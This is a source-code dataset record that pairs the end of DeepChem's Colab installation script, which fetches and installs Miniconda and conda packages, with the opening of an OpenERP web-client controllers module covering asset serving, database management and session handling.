if add_python_path and python_path not in sys.path:
logger.info("add {} to PYTHONPATH".format(python_path))
sys.path.append(python_path)
is_installed = []
packages = list(set(default_packages + additional_packages))
for package in packages:
package = "simtk" if package == "openmm" else package
is_installed.append(os.path.isdir(os.path.join(python_path, package)))
if all(is_installed):
logger.info("all packages are already installed")
return
url = url_base + file_name
python_version = "{0}.{1}.{2}".format(*sys.version_info)
logger.info("python version: {}".format(python_version))
if os.path.isdir(conda_path):
logger.warning("remove current miniconda")
shutil.rmtree(conda_path)
elif os.path.isfile(conda_path):
logger.warning("remove {}".format(conda_path))
os.remove(conda_path)
logger.info('fetching installer from {}'.format(url))
res = requests.get(url, stream=True)
res.raise_for_status()
with open(file_name, 'wb') as f:
for chunk in res.iter_content(chunk_size):
f.write(chunk)
logger.info('done')
logger.info('installing miniconda to {}'.format(conda_path))
subprocess.check_call(["bash", file_name, "-b", "-p", conda_path])
logger.info('done')
logger.info("installing openmm, pdbfixer")
channels = list(set(default_channels + additional_channels))
for channel in channels:
subprocess.check_call([
os.path.join(conda_path, "bin", "conda"), "config", "--append",
"channels", channel
])
logger.info("added {} to channels".format(channel))
subprocess.check_call([
os.path.join(conda_path, "bin", "conda"),
"install",
"--yes",
"python=={}".format(python_version),
*packages,
])
logger.info("done")
logger.info("conda packages installation finished!")
if __name__ == "__main__":
install()
|
deepchem/deepchem
|
scripts/colab_install.py
|
Python
|
mit
| 3,457
|
[
"MDTraj",
"OpenMM",
"RDKit"
] |
020295dee27522d2a868a52b7b97a5f5ea348e250dd05aa0d8459991859749dd
|
# -*- coding: utf-8 -*-
import ast
import base64
import csv
import functools
import glob
import itertools
import jinja2
import logging
import operator
import datetime
import hashlib
import os
import re
import simplejson
import time
import urllib2
import zlib
from xml.etree import ElementTree
from cStringIO import StringIO
import babel.messages.pofile
import werkzeug.utils
import werkzeug.wrappers
try:
import xlwt
except ImportError:
xlwt = None
import openerp
import openerp.modules.registry
from openerp.tools.translate import _
from openerp import http
from openerp.http import request, serialize_exception as _serialize_exception, LazyResponse
_logger = logging.getLogger(__name__)
env = jinja2.Environment(
loader=jinja2.PackageLoader('openerp.addons.web', "views"),
autoescape=True
)
env.filters["json"] = simplejson.dumps
#----------------------------------------------------------
# OpenERP Web helpers
#----------------------------------------------------------
def rjsmin(script):
""" Minify js with a clever regex.
Taken from http://opensource.perlig.de/rjsmin
Apache License, Version 2.0 """
def subber(match):
""" Substitution callback """
groups = match.groups()
return (
groups[0] or
groups[1] or
groups[2] or
groups[3] or
(groups[4] and '\n') or
(groups[5] and ' ') or
(groups[6] and ' ') or
(groups[7] and ' ') or
''
)
result = re.sub(
r'([^\047"/\000-\040]+)|((?:(?:\047[^\047\\\r\n]*(?:\\(?:[^\r\n]|\r?'
r'\n|\r)[^\047\\\r\n]*)*\047)|(?:"[^"\\\r\n]*(?:\\(?:[^\r\n]|\r?\n|'
r'\r)[^"\\\r\n]*)*"))[^\047"/\000-\040]*)|(?:(?<=[(,=:\[!&|?{};\r\n]'
r')(?:[\000-\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/'
r'))*((?:/(?![\r\n/*])[^/\\\[\r\n]*(?:(?:\\[^\r\n]|(?:\[[^\\\]\r\n]*'
r'(?:\\[^\r\n][^\\\]\r\n]*)*\]))[^/\\\[\r\n]*)*/)[^\047"/\000-\040]*'
r'))|(?:(?<=[\000-#%-,./:-@\[-^`{-~-]return)(?:[\000-\011\013\014\01'
r'6-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/))*((?:/(?![\r\n/*])[^/'
r'\\\[\r\n]*(?:(?:\\[^\r\n]|(?:\[[^\\\]\r\n]*(?:\\[^\r\n][^\\\]\r\n]'
r'*)*\]))[^/\\\[\r\n]*)*/)[^\047"/\000-\040]*))|(?<=[^\000-!#%&(*,./'
r':-@\[\\^`{|~])(?:[\000-\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/'
r'*][^*]*\*+)*/))*(?:((?:(?://[^\r\n]*)?[\r\n]))(?:[\000-\011\013\01'
r'4\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/))*)+(?=[^\000-\040"#'
r'%-\047)*,./:-@\\-^`|-~])|(?<=[^\000-#%-,./:-@\[-^`{-~-])((?:[\000-'
r'\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/)))+(?=[^'
r'\000-#%-,./:-@\[-^`{-~-])|(?<=\+)((?:[\000-\011\013\014\016-\040]|'
r'(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/)))+(?=\+)|(?<=-)((?:[\000-\011\0'
r'13\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/)))+(?=-)|(?:[\0'
r'00-\011\013\014\016-\040]|(?:/\*[^*]*\*+(?:[^/*][^*]*\*+)*/))+|(?:'
r'(?:(?://[^\r\n]*)?[\r\n])(?:[\000-\011\013\014\016-\040]|(?:/\*[^*'
r']*\*+(?:[^/*][^*]*\*+)*/))*)+', subber, '\n%s\n' % script
).strip()
return result
db_list = http.db_list
db_monodb = http.db_monodb
def serialize_exception(f):
@functools.wraps(f)
def wrap(*args, **kwargs):
try:
return f(*args, **kwargs)
except Exception, e:
_logger.exception("An exception occured during an http request")
se = _serialize_exception(e)
error = {
'code': 200,
'message': "OpenERP Server Error",
'data': se
}
return werkzeug.exceptions.InternalServerError(simplejson.dumps(error))
return wrap
def redirect_with_hash(*args, **kw):
"""
.. deprecated:: 8.0
Use the ``http.redirect_with_hash()`` function instead.
"""
return http.redirect_with_hash(*args, **kw)
def ensure_db(redirect='/web/database/selector'):
# This helper should be used in web client auth="none" routes
# if those routes needs a db to work with.
# If the heuristics does not find any database, then the users will be
# redirected to db selector or any url specified by `redirect` argument.
# If the db is taken out of a query parameter, it will be checked against
# `http.db_filter()` in order to ensure it's legit and thus avoid db
# forgering that could lead to xss attacks.
db = request.params.get('db')
# Ensure db is legit
if db and db not in http.db_filter([db]):
db = None
# if db not provided, use the session one
if not db:
db = request.session.db
# if no database provided and no database in session, use monodb
if not db:
db = db_monodb(request.httprequest)
# if no db can be found til here, send to the database selector
# the database selector will redirect to database manager if needed
if not db:
werkzeug.exceptions.abort(werkzeug.utils.redirect(redirect, 303))
# always switch the session to the computed db
if db != request.session.db:
request.session.logout()
request.session.db = db
def module_topological_sort(modules):
""" Return a list of module names sorted so that their dependencies of the
modules are listed before the module itself
modules is a dict of {module_name: dependencies}
:param modules: modules to sort
:type modules: dict
:returns: list(str)
"""
dependencies = set(itertools.chain.from_iterable(modules.itervalues()))
# incoming edge: dependency on other module (if a depends on b, a has an
# incoming edge from b, aka there's an edge from b to a)
# outgoing edge: other module depending on this one
# [Tarjan 1976], http://en.wikipedia.org/wiki/Topological_sorting#Algorithms
#L ← Empty list that will contain the sorted nodes
L = []
#S ← Set of all nodes with no outgoing edges (modules on which no other
# module depends)
S = set(module for module in modules if module not in dependencies)
visited = set()
#function visit(node n)
def visit(n):
#if n has not been visited yet then
if n not in visited:
#mark n as visited
visited.add(n)
#change: n not web module, can not be resolved, ignore
if n not in modules: return
#for each node m with an edge from m to n do (dependencies of n)
for m in modules[n]:
#visit(m)
visit(m)
#add n to L
L.append(n)
#for each node n in S do
for n in S:
#visit(n)
visit(n)
return L
def module_installed():
# Candidates module the current heuristic is the /static dir
loadable = http.addons_manifest.keys()
modules = {}
# Retrieve database installed modules
# TODO The following code should move to ir.module.module.list_installed_modules()
Modules = request.session.model('ir.module.module')
domain = [('state','=','installed'), ('name','in', loadable)]
for module in Modules.search_read(domain, ['name', 'dependencies_id']):
modules[module['name']] = []
deps = module.get('dependencies_id')
if deps:
deps_read = request.session.model('ir.module.module.dependency').read(deps, ['name'])
dependencies = [i['name'] for i in deps_read]
modules[module['name']] = dependencies
sorted_modules = module_topological_sort(modules)
return sorted_modules
def module_installed_bypass_session(dbname):
loadable = http.addons_manifest.keys()
modules = {}
try:
registry = openerp.modules.registry.RegistryManager.get(dbname)
with registry.cursor() as cr:
m = registry.get('ir.module.module')
# TODO The following code should move to ir.module.module.list_installed_modules()
domain = [('state','=','installed'), ('name','in', loadable)]
ids = m.search(cr, 1, [('state','=','installed'), ('name','in', loadable)])
for module in m.read(cr, 1, ids, ['name', 'dependencies_id']):
modules[module['name']] = []
deps = module.get('dependencies_id')
if deps:
deps_read = registry.get('ir.module.module.dependency').read(cr, 1, deps, ['name'])
dependencies = [i['name'] for i in deps_read]
modules[module['name']] = dependencies
except Exception,e:
pass
sorted_modules = module_topological_sort(modules)
return sorted_modules
def module_boot(db=None):
server_wide_modules = openerp.conf.server_wide_modules or ['web']
serverside = []
dbside = []
for i in server_wide_modules:
if i in http.addons_manifest:
serverside.append(i)
monodb = db or db_monodb()
if monodb:
dbside = module_installed_bypass_session(monodb)
dbside = [i for i in dbside if i not in serverside]
addons = serverside + dbside
return addons
def concat_xml(file_list):
"""Concatenate xml files
:param list(str) file_list: list of files to check
:returns: (concatenation_result, checksum)
:rtype: (str, str)
"""
checksum = hashlib.new('sha1')
if not file_list:
return '', checksum.hexdigest()
root = None
for fname in file_list:
with open(fname, 'rb') as fp:
contents = fp.read()
checksum.update(contents)
fp.seek(0)
xml = ElementTree.parse(fp).getroot()
if root is None:
root = ElementTree.Element(xml.tag)
#elif root.tag != xml.tag:
# raise ValueError("Root tags missmatch: %r != %r" % (root.tag, xml.tag))
for child in xml.getchildren():
root.append(child)
return ElementTree.tostring(root, 'utf-8'), checksum.hexdigest()
def concat_files(file_list, reader=None, intersperse=""):
""" Concatenates contents of all provided files
:param list(str) file_list: list of files to check
:param function reader: reading procedure for each file
:param str intersperse: string to intersperse between file contents
:returns: (concatenation_result, checksum)
:rtype: (str, str)
"""
checksum = hashlib.new('sha1')
if not file_list:
return '', checksum.hexdigest()
if reader is None:
def reader(f):
import codecs
with codecs.open(f, 'rb', "utf-8-sig") as fp:
return fp.read().encode("utf-8")
files_content = []
for fname in file_list:
contents = reader(fname)
checksum.update(contents)
files_content.append(contents)
files_concat = intersperse.join(files_content)
return files_concat, checksum.hexdigest()
concat_js_cache = {}
def concat_js(file_list):
content, checksum = concat_files(file_list, intersperse=';')
if checksum in concat_js_cache:
content = concat_js_cache[checksum]
else:
content = rjsmin(content)
concat_js_cache[checksum] = content
return content, checksum
def fs2web(path):
"""convert FS path into web path"""
return '/'.join(path.split(os.path.sep))
def manifest_glob(extension, addons=None, db=None, include_remotes=False):
if addons is None:
addons = module_boot(db=db)
else:
addons = addons.split(',')
r = []
for addon in addons:
manifest = http.addons_manifest.get(addon, None)
if not manifest:
continue
# ensure does not ends with /
addons_path = os.path.join(manifest['addons_path'], '')[:-1]
globlist = manifest.get(extension, [])
for pattern in globlist:
if pattern.startswith(('http://', 'https://', '//')):
if include_remotes:
r.append((None, pattern))
else:
for path in glob.glob(os.path.normpath(os.path.join(addons_path, addon, pattern))):
r.append((path, fs2web(path[len(addons_path):])))
return r
def manifest_list(extension, mods=None, db=None, debug=False):
""" list ressources to load specifying either:
mods: a comma separated string listing modules
db: a database name (return all installed modules in that database)
"""
files = manifest_glob(extension, addons=mods, db=db, include_remotes=True)
if not debug:
path = '/web/webclient/' + extension
if mods is not None:
path += '?' + werkzeug.url_encode({'mods': mods})
elif db:
path += '?' + werkzeug.url_encode({'db': db})
remotes = [wp for fp, wp in files if fp is None]
return [path] + remotes
return [wp for _fp, wp in files]
def get_last_modified(files):
""" Returns the modification time of the most recently modified
file provided
:param list(str) files: names of files to check
:return: most recent modification time amongst the fileset
:rtype: datetime.datetime
"""
files = list(files)
if files:
return max(datetime.datetime.fromtimestamp(os.path.getmtime(f))
for f in files)
return datetime.datetime(1970, 1, 1)
def make_conditional(response, last_modified=None, etag=None):
""" Makes the provided response conditional based upon the request,
and mandates revalidation from clients
Uses Werkzeug's own :meth:`ETagResponseMixin.make_conditional`, after
setting ``last_modified`` and ``etag`` correctly on the response object
:param response: Werkzeug response
:type response: werkzeug.wrappers.Response
:param datetime.datetime last_modified: last modification date of the response content
:param str etag: some sort of checksum of the content (deep etag)
:return: the response object provided
:rtype: werkzeug.wrappers.Response
"""
response.cache_control.must_revalidate = True
response.cache_control.max_age = 0
if last_modified:
response.last_modified = last_modified
if etag:
response.set_etag(etag)
return response.make_conditional(request.httprequest)
def login_and_redirect(db, login, key, redirect_url='/web'):
request.session.authenticate(db, login, key)
return set_cookie_and_redirect(redirect_url)
def set_cookie_and_redirect(redirect_url):
redirect = werkzeug.utils.redirect(redirect_url, 303)
redirect.autocorrect_location_header = False
return redirect
def load_actions_from_ir_values(key, key2, models, meta):
Values = request.session.model('ir.values')
actions = Values.get(key, key2, models, meta, request.context)
return [(id, name, clean_action(action))
for id, name, action in actions]
def clean_action(action):
action.setdefault('flags', {})
action_type = action.setdefault('type', 'ir.actions.act_window_close')
if action_type == 'ir.actions.act_window':
return fix_view_modes(action)
return action
# I think generate_views,fix_view_modes should go into js ActionManager
def generate_views(action):
"""
While the server generates a sequence called "views" computing dependencies
between a bunch of stuff for views coming directly from the database
(the ``ir.actions.act_window model``), it's also possible for e.g. buttons
to return custom view dictionaries generated on the fly.
In that case, there is no ``views`` key available on the action.
Since the web client relies on ``action['views']``, generate it here from
``view_mode`` and ``view_id``.
Currently handles two different cases:
* no view_id, multiple view_mode
* single view_id, single view_mode
:param dict action: action descriptor dictionary to generate a views key for
"""
view_id = action.get('view_id') or False
if isinstance(view_id, (list, tuple)):
view_id = view_id[0]
# providing at least one view mode is a requirement, not an option
view_modes = action['view_mode'].split(',')
if len(view_modes) > 1:
if view_id:
raise ValueError('Non-db action dictionaries should provide '
'either multiple view modes or a single view '
'mode and an optional view id.\n\n Got view '
'modes %r and view id %r for action %r' % (
view_modes, view_id, action))
action['views'] = [(False, mode) for mode in view_modes]
return
action['views'] = [(view_id, view_modes[0])]
def fix_view_modes(action):
""" For historical reasons, OpenERP has weird dealings in relation to
view_mode and the view_type attribute (on window actions):
* one of the view modes is ``tree``, which stands for both list views
and tree views
* the choice is made by checking ``view_type``, which is either
``form`` for a list view or ``tree`` for an actual tree view
This methods simply folds the view_type into view_mode by adding a
new view mode ``list`` which is the result of the ``tree`` view_mode
in conjunction with the ``form`` view_type.
TODO: this should go into the doc, some kind of "peculiarities" section
:param dict action: an action descriptor
:returns: nothing, the action is modified in place
"""
if not action.get('views'):
generate_views(action)
if action.pop('view_type', 'form') != 'form':
return action
if 'view_mode' in action:
action['view_mode'] = ','.join(
mode if mode != 'tree' else 'list'
for mode in action['view_mode'].split(','))
action['views'] = [
[id, mode if mode != 'tree' else 'list']
for id, mode in action['views']
]
return action
def _local_web_translations(trans_file):
messages = []
try:
with open(trans_file) as t_file:
po = babel.messages.pofile.read_po(t_file)
except Exception:
return
for x in po:
if x.id and x.string and "openerp-web" in x.auto_comments:
messages.append({'id': x.id, 'string': x.string})
return messages
def xml2json_from_elementtree(el, preserve_whitespaces=False):
""" xml2json-direct
Simple and straightforward XML-to-JSON converter in Python
New BSD Licensed
http://code.google.com/p/xml2json-direct/
"""
res = {}
if el.tag[0] == "{":
ns, name = el.tag.rsplit("}", 1)
res["tag"] = name
res["namespace"] = ns[1:]
else:
res["tag"] = el.tag
res["attrs"] = {}
for k, v in el.items():
res["attrs"][k] = v
kids = []
if el.text and (preserve_whitespaces or el.text.strip() != ''):
kids.append(el.text)
for kid in el:
kids.append(xml2json_from_elementtree(kid, preserve_whitespaces))
if kid.tail and (preserve_whitespaces or kid.tail.strip() != ''):
kids.append(kid.tail)
res["children"] = kids
return res
def content_disposition(filename):
filename = filename.encode('utf8')
escaped = urllib2.quote(filename)
browser = request.httprequest.user_agent.browser
version = int((request.httprequest.user_agent.version or '0').split('.')[0])
if browser == 'msie' and version < 9:
return "attachment; filename=%s" % escaped
elif browser == 'safari':
return "attachment; filename=%s" % filename
else:
return "attachment; filename*=UTF-8''%s" % escaped
#----------------------------------------------------------
# OpenERP Web web Controllers
#----------------------------------------------------------
# TODO: to remove once the database manager has been migrated server side
# and `edi` + `pos` addons has been adapted to use render_bootstrap_template()
html_template = """<!DOCTYPE html>
<html style="height: 100%%">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>OpenERP</title>
<link rel="shortcut icon" href="/web/static/src/img/favicon.ico" type="image/x-icon"/>
<link rel="stylesheet" href="/web/static/src/css/full.css" />
%(css)s
%(js)s
<script type="text/javascript">
$(function() {
var s = new openerp.init(%(modules)s);
%(init)s
});
</script>
</head>
<body>
<!--[if lte IE 8]>
<script src="//ajax.googleapis.com/ajax/libs/chrome-frame/1/CFInstall.min.js"></script>
<script>CFInstall.check({mode: "overlay"});</script>
<![endif]-->
</body>
</html>
"""
def render_bootstrap_template(db, template, values=None, debug=False, lazy=False, **kw):
if request and request.debug:
debug = True
if values is None:
values = {}
values.update(kw)
values['debug'] = debug
values['current_db'] = db
try:
values['databases'] = http.db_list()
except openerp.exceptions.AccessDenied:
values['databases'] = None
for res in ['js', 'css']:
if res not in values:
values[res] = manifest_list(res, db=db, debug=debug)
if 'modules' not in values:
values['modules'] = module_boot(db=db)
values['modules'] = simplejson.dumps(values['modules'])
def callback(template, values):
registry = openerp.modules.registry.RegistryManager.get(db)
with registry.cursor() as cr:
view_obj = registry["ir.ui.view"]
return view_obj.render(cr, openerp.SUPERUSER_ID, template, values)
if lazy:
return LazyResponse(callback, template=template, values=values)
else:
return callback(template, values)
class Home(http.Controller):
@http.route('/', type='http', auth="none")
def index(self, s_action=None, db=None, **kw):
return http.local_redirect('/web', query=request.params)
@http.route('/web', type='http', auth="none")
def web_client(self, s_action=None, **kw):
ensure_db()
if request.session.uid:
html = render_bootstrap_template(request.session.db, "web.webclient_bootstrap")
return request.make_response(html, {'Cache-Control': 'no-cache', 'Content-Type': 'text/html; charset=utf-8'})
else:
return http.local_redirect('/web/login', query=request.params)
@http.route('/web/login', type='http', auth="none")
def web_login(self, redirect=None, **kw):
ensure_db()
values = request.params.copy()
if not redirect:
redirect = '/web?' + request.httprequest.query_string
values['redirect'] = redirect
if request.httprequest.method == 'POST':
uid = request.session.authenticate(request.session.db, request.params['login'], request.params['password'])
if uid is not False:
return http.redirect_with_hash(redirect)
values['error'] = "Wrong login/password"
return render_bootstrap_template(request.session.db, 'web.login', values, lazy=True)
@http.route('/login', type='http', auth="none")
def login(self, db, login, key, redirect="/web", **kw):
return login_and_redirect(db, login, key, redirect_url=redirect)
class WebClient(http.Controller):
@http.route('/web/webclient/csslist', type='json', auth="none")
def csslist(self, mods=None):
return manifest_list('css', mods=mods)
@http.route('/web/webclient/jslist', type='json', auth="none")
def jslist(self, mods=None):
return manifest_list('js', mods=mods)
@http.route('/web/webclient/qweblist', type='json', auth="none")
def qweblist(self, mods=None):
return manifest_list('qweb', mods=mods)
@http.route('/web/webclient/css', type='http', auth="none")
def css(self, mods=None, db=None):
files = list(manifest_glob('css', addons=mods, db=db))
last_modified = get_last_modified(f[0] for f in files)
if request.httprequest.if_modified_since and request.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
file_map = dict(files)
rx_import = re.compile(r"""@import\s+('|")(?!'|"|/|https?://)""", re.U)
rx_url = re.compile(r"""url\s*\(\s*('|"|)(?!'|"|/|https?://|data:)""", re.U)
def reader(f):
"""read the a css file and absolutify all relative uris"""
with open(f, 'rb') as fp:
data = fp.read().decode('utf-8')
path = file_map[f]
web_dir = os.path.dirname(path)
data = re.sub(
rx_import,
r"""@import \1%s/""" % (web_dir,),
data,
)
data = re.sub(
rx_url,
r"url(\1%s/" % (web_dir,),
data,
)
return data.encode('utf-8')
content, checksum = concat_files((f[0] for f in files), reader)
# move up all @import and @charset rules to the top
matches = []
def push(matchobj):
matches.append(matchobj.group(0))
return ''
content = re.sub(re.compile("(@charset.+;$)", re.M), push, content)
content = re.sub(re.compile("(@import.+;$)", re.M), push, content)
matches.append(content)
content = '\n'.join(matches)
return make_conditional(
request.make_response(content, [('Content-Type', 'text/css')]),
last_modified, checksum)
@http.route('/web/webclient/js', type='http', auth="none")
def js(self, mods=None, db=None):
files = [f[0] for f in manifest_glob('js', addons=mods, db=db)]
last_modified = get_last_modified(files)
if request.httprequest.if_modified_since and request.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
content, checksum = concat_js(files)
return make_conditional(
request.make_response(content, [('Content-Type', 'application/javascript')]),
last_modified, checksum)
@http.route('/web/webclient/qweb', type='http', auth="none")
def qweb(self, mods=None, db=None):
files = [f[0] for f in manifest_glob('qweb', addons=mods, db=db)]
last_modified = get_last_modified(files)
if request.httprequest.if_modified_since and request.httprequest.if_modified_since >= last_modified:
return werkzeug.wrappers.Response(status=304)
content, checksum = concat_xml(files)
return make_conditional(
request.make_response(content, [('Content-Type', 'text/xml')]),
last_modified, checksum)
@http.route('/web/webclient/bootstrap_translations', type='json', auth="none")
def bootstrap_translations(self, mods):
""" Load local translations from *.po files, as a temporary solution
until we have established a valid session. This is meant only
for translating the login page and db management chrome, using
the browser's language. """
# For performance reasons we only load a single translation, so for
# sub-languages (that should only be partially translated) we load the
# main language PO instead - that should be enough for the login screen.
lang = request.lang.split('_')[0]
translations_per_module = {}
for addon_name in mods:
if http.addons_manifest[addon_name].get('bootstrap'):
addons_path = http.addons_manifest[addon_name]['addons_path']
f_name = os.path.join(addons_path, addon_name, "i18n", lang + ".po")
if not os.path.exists(f_name):
continue
translations_per_module[addon_name] = {'messages': _local_web_translations(f_name)}
return {"modules": translations_per_module,
"lang_parameters": None}
@http.route('/web/webclient/translations', type='json', auth="none")
def translations(self, mods=None, lang=None):
request.disable_db = False
uid = openerp.SUPERUSER_ID
if mods is None:
m = request.registry.get('ir.module.module')
mods = [x['name'] for x in m.search_read(request.cr, uid,
[('state','=','installed')], ['name'])]
if lang is None:
lang = request.context["lang"]
res_lang = request.registry.get('res.lang')
ids = res_lang.search(request.cr, uid, [("code", "=", lang)])
lang_params = None
if ids:
lang_params = res_lang.read(request.cr, uid, ids[0], ["direction", "date_format", "time_format",
"grouping", "decimal_point", "thousands_sep"])
# Regional languages (ll_CC) must inherit/override their parent lang (ll), but this is
# done server-side when the language is loaded, so we only need to load the user's lang.
ir_translation = request.registry.get('ir.translation')
translations_per_module = {}
messages = ir_translation.search_read(request.cr, uid, [('module','in',mods),('lang','=',lang),
('comments','like','openerp-web'),('value','!=',False),
('value','!=','')],
['module','src','value','lang'], order='module')
for mod, msg_group in itertools.groupby(messages, key=operator.itemgetter('module')):
translations_per_module.setdefault(mod,{'messages':[]})
translations_per_module[mod]['messages'].extend({'id': m['src'],
'string': m['value']} \
for m in msg_group)
return {"modules": translations_per_module,
"lang_parameters": lang_params}
@http.route('/web/webclient/version_info', type='json', auth="none")
def version_info(self):
return openerp.service.common.exp_version()
class Proxy(http.Controller):
@http.route('/web/proxy/load', type='json', auth="none")
def load(self, path):
""" Proxies an HTTP request through a JSON request.
It is strongly recommended to not request binary files through this,
as the result will be a binary data blob as well.
:param path: actual request path
:return: file content
"""
from werkzeug.test import Client
from werkzeug.wrappers import BaseResponse
return Client(request.httprequest.app, BaseResponse).get(path).data
class Database(http.Controller):
@http.route('/web/database/selector', type='http', auth="none")
def selector(self, **kw):
try:
dbs = http.db_list()
if not dbs:
return http.local_redirect('/web/database/manager')
except openerp.exceptions.AccessDenied:
dbs = False
return env.get_template("database_selector.html").render({
'databases': dbs,
'debug': request.debug,
})
@http.route('/web/database/manager', type='http', auth="none")
def manager(self, **kw):
# TODO: migrate the webclient's database manager to server side views
request.session.logout()
js = "\n ".join('<script type="text/javascript" src="%s"></script>' % i for i in manifest_list('js', debug=request.debug))
css = "\n ".join('<link rel="stylesheet" href="%s">' % i for i in manifest_list('css', debug=request.debug))
r = html_template % {
'js': js,
'css': css,
'modules': simplejson.dumps(module_boot()),
'init': """
var wc = new s.web.WebClient(null, { action: 'database_manager' });
wc.appendTo($(document.body));
"""
}
return r
@http.route('/web/database/get_list', type='json', auth="none")
def get_list(self):
# TODO change js to avoid calling this method if in monodb mode
try:
return http.db_list()
except openerp.exceptions.AccessDenied:
monodb = db_monodb()
if monodb:
return [monodb]
raise
@http.route('/web/database/create', type='json', auth="none")
def create(self, fields):
params = dict(map(operator.itemgetter('name', 'value'), fields))
db_created = request.session.proxy("db").create_database(
params['super_admin_pwd'],
params['db_name'],
bool(params.get('demo_data')),
params['db_lang'],
params['create_admin_pwd'])
if db_created:
request.session.authenticate(params['db_name'], 'admin', params['create_admin_pwd'])
return db_created
@http.route('/web/database/duplicate', type='json', auth="none")
def duplicate(self, fields):
params = dict(map(operator.itemgetter('name', 'value'), fields))
duplicate_attrs = (
params['super_admin_pwd'],
params['db_original_name'],
params['db_name'],
)
return request.session.proxy("db").duplicate_database(*duplicate_attrs)
@http.route('/web/database/drop', type='json', auth="none")
def drop(self, fields):
password, db = operator.itemgetter(
'drop_pwd', 'drop_db')(
dict(map(operator.itemgetter('name', 'value'), fields)))
try:
if request.session.proxy("db").drop(password, db):
return True
else:
return False
except openerp.exceptions.AccessDenied:
return {'error': 'AccessDenied', 'title': 'Drop Database'}
except Exception:
return {'error': _('Could not drop database !'), 'title': _('Drop Database')}
@http.route('/web/database/backup', type='http', auth="none")
def backup(self, backup_db, backup_pwd, token):
try:
db_dump = base64.b64decode(
request.session.proxy("db").dump(backup_pwd, backup_db))
filename = "%(db)s_%(timestamp)s.dump" % {
'db': backup_db,
'timestamp': datetime.datetime.utcnow().strftime(
"%Y-%m-%d_%H-%M-%SZ")
}
return request.make_response(db_dump,
[('Content-Type', 'application/octet-stream; charset=binary'),
('Content-Disposition', content_disposition(filename))],
{'fileToken': token}
)
except Exception, e:
return simplejson.dumps([[],[{'error': openerp.tools.ustr(e), 'title': _('Backup Database')}]])
@http.route('/web/database/restore', type='http', auth="none")
def restore(self, db_file, restore_pwd, new_db):
try:
data = base64.b64encode(db_file.read())
request.session.proxy("db").restore(restore_pwd, new_db, data)
return ''
except openerp.exceptions.AccessDenied, e:
raise Exception("AccessDenied")
@http.route('/web/database/change_password', type='json', auth="none")
def change_password(self, fields):
old_password, new_password = operator.itemgetter(
'old_pwd', 'new_pwd')(
dict(map(operator.itemgetter('name', 'value'), fields)))
try:
return request.session.proxy("db").change_admin_password(old_password, new_password)
except openerp.exceptions.AccessDenied:
return {'error': 'AccessDenied', 'title': _('Change Password')}
except Exception:
return {'error': _('Error, password not changed !'), 'title': _('Change Password')}
class Session(http.Controller):
def session_info(self):
request.session.ensure_valid()
return {
"session_id": request.session_id,
"uid": request.session.uid,
"user_context": request.session.get_context() if request.session.uid else {},
"db": request.session.db,
"username": request.session.login,
}
@http.route('/web/session/get_session_info', type='json', auth="none")
def get_session_info(self):
request.uid = request.session.uid
request.disable_db = False
return self.session_info()
@http.route('/web/session/authenticate', type='json', auth="none")
def authenticate(self, db, login, password, base_location=None):
request.session.authenticate(db, login, password)
return self.session_info()
@http.route('/web/session/change_password', type='json', auth="user")
def change_password(self, fields):
old_password, new_password,confirm_password = operator.itemgetter('old_pwd', 'new_password','confirm_pwd')(
dict(map(operator.itemgetter('name', 'value'), fields)))
if not (old_password.strip() and new_password.strip() and confirm_password.strip()):
return {'error':_('You cannot leave any password empty.'),'title': _('Change Password')}
if new_password != confirm_password:
return {'error': _('The new password and its confirmation must be identical.'),'title': _('Change Password')}
try:
if request.session.model('res.users').change_password(
old_password, new_password):
return {'new_password':new_password}
except Exception:
return {'error': _('The old password you provided is incorrect, your password was not changed.'), 'title': _('Change Password')}
return {'error': _('Error, password not changed !'), 'title': _('Change Password')}
@http.route('/web/session/get_lang_list', type='json', auth="none")
def get_lang_list(self):
try:
return request.session.proxy("db").list_lang() or []
except Exception, e:
return {"error": e, "title": _("Languages")}
@http.route('/web/session/modules', type='json', auth="user")
def modules(self):
# return all installed modules. Web client is smart enough to not load a module twice
return module_installed()
@http.route('/web/session/save_session_action', type='json', auth="user")
def save_session_action(self, the_action):
"""
This method store an action object in the session object and returns an integer
identifying that action. The method get_session_action() can be used to get
back the action.
:param the_action: The action to save in the session.
:type the_action: anything
:return: A key identifying the saved action.
:rtype: integer
"""
saved_actions = request.httpsession.get('saved_actions')
if not saved_actions:
saved_actions = {"next":1, "actions":{}}
request.httpsession['saved_actions'] = saved_actions
# we don't allow more than 10 stored actions
if len(saved_actions["actions"]) >= 10:
del saved_actions["actions"][min(saved_actions["actions"])]
key = saved_actions["next"]
saved_actions["actions"][key] = the_action
saved_actions["next"] = key + 1
request.httpsession['saved_actions'] = saved_actions
return key
@http.route('/web/session/get_session_action', type='json', auth="user")
def get_session_action(self, key):
"""
Gets back a previously saved action. This method can return None if the action
was saved since too much time (this case should be handled in a smart way).
:param key: The key given by save_session_action()
:type key: integer
:return: The saved action or None.
:rtype: anything
"""
saved_actions = request.httpsession.get('saved_actions')
if not saved_actions:
return None
return saved_actions["actions"].get(key)
@http.route('/web/session/check', type='json', auth="user")
def check(self):
request.session.assert_valid()
return None
@http.route('/web/session/destroy', type='json', auth="user")
def destroy(self):
request.session.logout()
@http.route('/web/session/logout', type='http', auth="none")
def logout(self, redirect='/web'):
request.session.logout(keep_db=True)
return werkzeug.utils.redirect(redirect, 303)
class Menu(http.Controller):
@http.route('/web/menu/get_user_roots', type='json', auth="user")
def get_user_roots(self):
""" Return all root menu ids visible for the session user.
:return: the root menu ids
:rtype: list(int)
"""
s = request.session
Menus = s.model('ir.ui.menu')
# If a menu action is defined use its domain to get the root menu items
user_menu_id = s.model('res.users').read([s.uid], ['menu_id'],
request.context)[0]['menu_id']
menu_domain = [('parent_id', '=', False)]
if user_menu_id:
domain_string = s.model('ir.actions.act_window').read(
